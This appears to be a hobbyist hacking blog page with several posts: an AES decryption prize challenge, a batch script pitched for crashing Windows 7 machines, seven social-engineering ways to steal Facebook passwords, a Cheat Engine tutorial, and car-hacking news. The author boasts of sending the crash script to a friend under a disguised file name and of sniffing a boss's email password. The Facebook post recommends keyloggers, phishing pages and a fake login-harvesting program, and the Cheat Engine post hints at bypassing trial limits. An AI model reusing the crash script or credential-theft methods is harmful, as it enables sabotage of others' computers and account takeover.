Decrypt these codes for USD25,000.00

An anonymous team had organized a decryption challenge with an award of RM100,000.00 (approx. USD25,000.00) to decrypt three set of codes. This challenge had been highlighted in Lowyat.net website, the biggest I.T community in Malaysia.

These codes had been encrypted using AES-256 military grade encryption method. Yup, 256bit and 14 hashes. That will take a very loooooooong time to bruteforce. You must have the secret keys to decipher the codes.

The encrypted codes are :

Code 1

 –##–eyJHMDkwMjQwQiI6IlVFMFFJZG5ERFl2K1wvdkUrY20wT2JnbHhGR1wvYkJhcGlrRmlaWmtSWFwvVktIM1dKc20zTlVDVjJXWDB4YTRUVFJpVEJvVDN5NFZGNHNmNllmanVKWGdZSmlOcExKZVZOajUycGtYNURXbUZ5RGxZVkhXRWRVQ0JOTVVhYm1SSWhuXC9tWVY0a1ZqME5oUnJJQlwvM1ZNTEhzY1JvYXl1WDhhWnkzQ1pOOUNSSGtvPSJ9–##–XMthlftLS6A62CLoaRG9I6lRCmmktQ1ZF8rkfIYZmOMI/oS26IXrm2dHgTmLsVFi5kK0EYvlSjzOkn14uMOGJCIkYpghmGm3FSsRGfRrRUGKetvAsokQi+Sra3RmxoxXCWwBuVwdNt9pMadvItMzdFYinyhNmw+OBbYuPgmIiQwwtOydHJ46y9U8kJYlNzEfjH4hnc3GsD+xfwZQutQXYi1C+PxOGpIcvwjIoTccGL4Wp673JFHjs/EjREtCz9Lq–##–

Code 2

–##–eyJHMDkwNjQ3MiI6IkRZbjg1NUpKVnJOajRuV055akNnUGlwdllBSjVXUDJPeHRxdDBzeVltNlN5ZUlkbXNwNnFRMzNQdVZQT1wvQ2tLVzNLUURsK2ZkajZLK2I3bytDNTlYMGdia3hIcHlyUmtwbUFBRUUzZEhSXC9RcUU3QTlOUGFWcGk3NjhleVA0ZFdLR0orYjZTQVZGVGF4amV4Y1A3THVBdVFCcHpCemlxcXpiSjNjZDFINjhBPSJ9–##–K1JCm+R+1MEZhcOtN8bLNui4ulpKbPaDqB2pzq5gSB2M4k77oxb4PTkFaEt1z3YZxJ8OVMQyCSFcfQePwbwjxLqbq00+kVmNdw4j30Cd/459RBCfDsRodayJdoACk91mn+PLCor2bjJa4ZOJn6D3kvJS0HV85mVnxe1bgWFqrW+rzyQZGjKO/i53MH3vdCSEmjpxLHmziRq2xHoDGKDm7Y5KLto949aAZVOZNkD83pSNOjja2nNuQZuetjCzR2tn1uDZ3iHHxzpdkBeJ6I8pj7YifljZ9bMqSKk8c2LhPGO06gJvCfgetnkjh0CC28rk–##–

Code 3

–##–eyJHMDkwNkIyRCI6Ik81ck5DcG1Tb0VyZUFUNGVxSFk0c2RGRW9Fc0F2ZHJSQ21aenBRUktqMHNoYnNlY2ozak9uYkt1c2drajJaUjZrMHlzMHVaSUZ3ckMyRmpWbmVOaWdPc2Vud3hoTkNzZWIzUDRkK2syM1dNdUFRYVNJNTAzWHdDcGcyWnVaYnhtbWpOQnFPd2E3cFhFczRGajJaUENvcG4zRDJCQ1hpaFRCeXNlUndhQnU1QT0ifQ==–##–Rnk1a0AO/xWjkTbJ08r0abZ12Bz+edMuOWXrAk9BfoB3vrXS4zaZsNwIYIsGwieo/OR/BzRBOnmRFW0dsieLYXKr1cBswqtKgnS+xhjjDmlfPFwemZzoIOe2X4FWmuwgluKSMkk+vPxpa9LwkAx3tqiUYsYY2tKjR5HP5D3T2N/1JqdJaKcXw4cQwnwmvqmma+Dzb76Q01Pk8+n6MzoTJ1wG21h2HgM1g2ZelELcgXu+jBdO4jtPpqgWy3w1FnNBlFLoVp7ey5QiaDkLEJvJksfbBooEDLc+4Cmf7U5QNrg8uNY7XXfSAo7PPTaVOoDT–##–

The organizer had set up a set of rules and regulations :

1. This challenge is open to all Malaysians and Singaporeans to participate
2. Participant must decipher ALL the 3 encrypted messages correctly to be considered as a winner
3. Participant will need to provide their email address and contact number upon submission
4. Participant will need to submit ALL answers latest by 17th Sept 2015 at 12.00pm. Any late submissions will not be entertained
5. Participant to email the answers to hackchallenge@yahoo.com
6. Organizers will only contact participants with the correct answers
7. Participants who successfully deciphered the messages will be requested to do a demonstration to the organizers on the way the messages were deciphered
8. Submissions from participants who are related directly or indirectly to the organizer and the rest of the team will be disqualified.

Well, it is a bad news for peoples from outside of Malaysia and Singapore as this challenge is opens only to Malaysian and Singaporean but if you can decipher the code, you surely know how to beat the rules.

The organizer had set up a website for this challenge with some introductions to AES256 encryption and some hidden secret keys. Go to their website here and start digging. Good luck. 

Read This Got This : Customize blog labels and add home button to your blog header area
Read This Got This : Safeguard your WIFI network
Read This Got This : Facebook authorship for blogger.com users 

Continue Reading →

Crash a Win 7 system with a simple batch file

Some evening, a friend of mine asked me if I ever have hacked a network or ever created a virus program or ever created a batch file that has the ability to crash a Win 7 system, my answer was no without ever seeing him in the eyes. Although I had done those before, my answer is always no because I don't want to be seen, unless I want to be recognized.

Actually I had once captured the email password of my ex-boss using network capture program. That time, our corporate e-mail used a very simple e-mail client without any encryption. I got the password and actually felt my effort was useless because he was still using default password supplied to every new recruit enrolled in our company. 

Another time, I used IP scanner to find the IP's of thumbprint system on our office, found the information of the brand and downloaded the utility software of the system. Using common set of familiar admin password, I got access to the system and read the system's record but I didn't do anything on that and I didn't tell anyone on the breakthrough. Then on self integrity reason I removed the software from my laptop

Last year, another friend of mine keeps irritating me with his 'mooning' Skype smiley everyday. I just can't resist to punish him so I started searching on the Internet on how to use windows scripting to run a simple command in continuous loop.  I found my way, and send him the file with an innocent-can't- help-but-to-open file name then his laptop crashed. Even me myself can't do anything to stop the script except to force reset the machine. He got what he deserved, it was kind of me not to put the command to autorun the file on boot cycle. Let's study the code

---------------------------------------X start below this line--------------------------

SET /a i=0

:loop

IF %i%==10 GOTO END

start rahsia.bat 

ping anywebsite.com

SET /a i=%i%=1

GOTO LOOP

:END

---------------------------------------Until before this line-------------------------

Replace the red font rahsia.bat with the file name of the file

Replace the red font anywebsite.com with any website address. This is the simple command.

The loop break on i=10 but i value always get reset to 1 so the loop will keep looping continuously.

Copy the lines of code and paste in notepad, save as type all type save as name as what you replaced the rahsia.bat red font. 

Run the file.

BEWARE: This file is simple but it is really and proven , tested to have the ability to crash a win 7 system. USE on YOUR own risk. I am not going to take any responsibility for any damaged done to your system. 

Continue Reading →

How to remove black shadow box without clicking anything

If you click on certain links posted on facebook, there is a chance that the link will force you to like their facebook pages or share their link to remove black shadow blocking visual access to the website. How to remove black shadow box without clicking anything?

Some people just click on the like button or share button and your partner, your friend , your child, your mama could see it on your timeline. It could be embarrassing if the link is an adult only link or sexy picture or sex technique. In certain part of the world, those kind interest is somewhat embarrassing. 

Some people just close the link or click the back button but what if the link is too interesting not to read about. There must be some way to overcome this headache. Some people already know the trick while many more didn't know it. Read on..

1. Chrome extension

There are some extension called quick javascript switch switcher which can quickly switch javascript to enable/disable, script block that can block additional script from running and AdBlock which can block all ads from showing. Ads usually use javascript and ,<script> element to run. Those extension detect the element and block it form running. Some ads provider has overcome these by developing anti script block and anti ad block that can detect if your browser has these extension, the webpage will stop loading

2. Inspect element (Chrome)

To toggle inspect element, right click and select inspect element. There is a script that prevent right clicking, use the shortcut (ctrl+shift+C). Now they also have a script that prevent the shortcut, just open a new tab and toggle inspect element then copy the link address on the toggled inspect element tab.

Now click on the magnifying class, it will turn to blue, then hover to the black area, the whole black area is greyed out if it is the right place. Then click on highlighted text in the bottom section. Delete the line.

The black shadow is now vanished. No more embarrassing likes or shares on your timeline.

That's my way on how to remove black shadow box without clicking anything. For those who just happened to know about inspect element. Be creative and explore other means on using this function. Hint..: some mask

Continue Reading →

7 social engineering techniques to steal facebook password

Facebook has become more and more secure and is very hard to be hacked off to steal anyone's password. In one episode of a popular series, Leverage, they had come upon a person which us an old computer without any connection to the outer world and made hacking the computer to be impossible. Guess what, they hack the guy's mind. Literally, of course. Using the same idea, listed here 7 social engineering techniques to steal facebook password.


1. Share your laptop with the target. Use google chrome  

Let the victim use your laptop/PC with your chrome browser left open logged in with your google account. Usually people will only click the left most button on any prompt. If you got lucky the target will save their facebook account password in your saved password database

2. Again, share your laptop/PC 

If the target is a detail person, they will read the save your password prompt and click on nope. Overcome this using a keylogger software that also keypress. Google it 

3. Install netviewer on the target computer 

Netviewer can allow you to peek the victim's screen and can control the computer remotely, it has a mobile remote. So, get creative, after they logged in on facebook, loose their attention and reroute then reroute the browser to a mimic facebook relogin page which store the login and password in a secret dark places

4. The old trick, e-mail 

If the victim network is heavily barricaded with a firewall, use the old technique by emailing them fake very similar link to facebook compulsory change password page or warning them on account login confirmation. Some fools will still fall for this trick

5. Cut the connection 

This trick needs you to sit near the network WAN connection physically. Whenever the victim login to their facebook account, pull out the cable. Then reconnect the cable after a while. They will freak out and then show them your cached facebook page and offer them to use your computer. Then again , use google chrome or keylogger technique

6. Develop a new software called facebook account stealer

Develop a new software which prompt the users to login and then display a mimic act of monitoring and searching for facebook account then give it an endless loop to make it a not responding programs and force close the software. Give it to the victim as a trial.

7. Ask them 

Ask them during their sleep talking. 80% of person will just answer any question asked during their sleep talking. Why don't you give it a try. 

Disclaimer :

Those are ideas only. Use it on your own creativity. This blog and the writer are not responsible of any facebook account stealed using this 7 social engineering techniques to steal facebook password

Continue Reading →

Win any game using cheat engine

Take a look at the picture on the left, the screenshot was captured on popular windows game, minesweeper. Mathematically and logically impossible for a normal person to complete the game in 1 second.

The picture was not photoshop, it is a genuine picture.
I made this possible using cheat engine. Usually cheats are purposely developed along with original games but for games like minesweeper, no official cheat ever been created.

Using cheat engine, we can cheat almost any games with proper technique and some creative mind. We can win any game using cheat engine







1. Download cheat engine at http://www.cheatengine.org/downloads.php and install it in your system

2. Open cheat engine ( use 64bit version if your OS is 64bit)

3. Open minesweeper games

4. Click on process explorer in cheat engine  and select minesweeper.exe then click on Open

5. Leave minesweeper, don't start clicking yet. Click on first scan, value type all and scan type value between. Insert 1 to 50 . Now click your first tile. The timer begin counting.

6. As soon as the timer started (make sure before timer reach 50 or you'll need to reset the value between again) click on first scan again. it will find any address with the value between 1 to 50 and display the result on the left tab

7. Select increased value on scan type and click on increased value repeatedly until you see an address with an increasing value and have the same value a the timer. If result list become empty , repeat the first scan and keep trying.

8. Double click on the suspect , the address will be copied to the bottom tab

9. To test the suspect, tick on the rectangle beside the address , the timer shall freeze now

10. Double click on the value at the bottom bar and insert the value to change . I.e ; 0 then click OK. The timer now changes to 0 and increase to 1 then freeze.

11. Keep on playing and finish the game. You have successfully cheated the minesweeper game.

This cheat engine could be used on various other games that used the RAM for temporary storage. Also if you get creative, you could bypass the trial or demo software limitation using this method. I.e: 5 song per session, 5 minutes per session. All you have to do is get creative and never stop trying. I must repeat, you can win any game using this cheat engine.

Continue Reading →

See how they hack a car

I've been finding the videos on how the guys in the last post hack and control a car. I thought they only got to lock and unlock the car, well that's pretty scary.

They got on the next level, disabled the steering system, take control off the wheel and the most horrible thing, they even disabled the braking system. And they did this to a jeep on a Highway. Yes. The highway. 

Pheww.. I'm lucky to only drive an old proton saga. No need to worry for someone remotely control my car. And guys... Never forget to bring your steering lock.

See the video below

Continue Reading →

This is why we need to maintain the traditional lock system in cars

Cars are now become more sophisticated, modern and effortless. There are cars that were equipped with their own control system, remote system and monitoring system. When it involves networking and internet, we need to ask the car manufacturer, can hackers hack a car? In 2010, there was a case where a merely 100 cars were hacked. It was later found out that it was inside job by an employee of a car dealer by taking advantage on a technology to enable remote repossession.

On early July 2015, two security researcher had demonstrated that they can actually hack a car and took control of the car. 

PCMAG has the full story.. 

Read the full story here

Continue Reading →